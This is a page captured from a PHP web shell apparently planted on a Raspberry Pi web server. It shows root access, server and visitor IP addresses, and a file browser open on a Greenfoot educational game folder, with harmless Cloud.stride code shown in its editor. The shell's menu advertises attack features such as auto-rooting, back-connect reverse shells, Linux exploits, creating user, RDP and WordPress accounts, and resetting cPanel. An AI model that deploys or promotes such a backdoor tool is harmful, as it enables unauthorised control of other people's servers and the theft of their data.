Linux lorencats.com 5.10.103-v7l+ #1529 SMP Tue Mar 8 12:24:00 GMT 2022 armv7l
Apache/2.4.59 (Raspbian)
: 10.0.0.29 | : 216.73.216.130
Cant Read [ /etc/named.conf ]
7.3.31-1~deb10u7
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
Greenfoot /
scenarios /
stride /
pengu /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
Cliff.class
566
B
-rw-r--r--
Cliff.java
608
B
-rw-r--r--
Cliff.stride
1.64
KB
-rw-r--r--
Cloud.class
867
B
-rw-r--r--
Cloud.java
937
B
-rw-r--r--
Cloud.stride
2.58
KB
-rw-r--r--
Mover.class
1.48
KB
-rw-r--r--
Mover.java
1.44
KB
-rw-r--r--
Mover.stride
4.36
KB
-rw-r--r--
Pengu.class
1.05
KB
-rw-r--r--
Pengu.java
1.2
KB
-rw-r--r--
Pengu.stride
3.97
KB
-rw-r--r--
README.TXT
345
B
-rw-r--r--
Scene.class
455
B
-rw-r--r--
Scene.java
524
B
-rw-r--r--
Scene.stride
1.31
KB
-rw-r--r--
project.greenfoot
1.59
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Cloud.stride
<?xml version="1.0" encoding="UTF-8"?> <class name="Cloud" extends="Actor" extends-java="Actor" enable="true" strideversion="1"> <javadoc xml:space="preserve">A cloud that moves back and forth between two defined points.</javadoc> <imports> <import target="java.util.*" enable="true"/> <import target="greenfoot.*" enable="true"/> </imports> <implements/> <fields> <variable access="private" type="int" type-java="int" name="speed" value="4" value-java="4" enable="true"/> <variable access="private" type="int" type-java="int" name="leftTurn" value="270" value-java="270" enable="true"/> <variable access="private" type="int" type-java="int" name="rightTurn" value="480" value-java="480" enable="true"/> </fields> <constructors/> <methods> <method access="public" type="void" type-java="void" name="act" enable="true"> <javadoc xml:space="preserve">Move in the direction we are currently moving in. Turn if we reach a turning point.</javadoc> <params/> <throws/> <body> <call expression="setLocation(getX()+speed,getY())" expression-java="setLocation(getX() + speed, getY())" enable="true"/> <blank/> <variable type="Actor" type-java="Actor" name="actor" value="getOneIntersectingObject(null)" value-java="getOneIntersectingObject(null)" enable="true"/> <if condition="actor!=null" condition-java="actor != null" enable="true"> <ifStatements> <call expression="actor.setLocation(actor.getX()+speed,actor.getY())" expression-java="actor.setLocation(actor.getX() + speed, actor.getY())" enable="true"/> </ifStatements> </if> <blank/> <if condition="atTurningPoint()" condition-java="atTurningPoint()" enable="true"> <ifStatements> <assign dest="speed" dest-java="speed" src="-speed" src-java=" - speed" enable="true"/> </ifStatements> </if> </body> </method> <method access="public" type="boolean" type-java="boolean" name="atTurningPoint" enable="true"> <javadoc xml:space="preserve">Test if we are at one of the turning points.</javadoc> <params/> <throws/> <body> <return value="getX()<=leftTurn||getX()>=rightTurn" value-java="getX() <= leftTurn || getX() >= rightTurn" enable="true"/> </body> </method> </methods> </class>
Close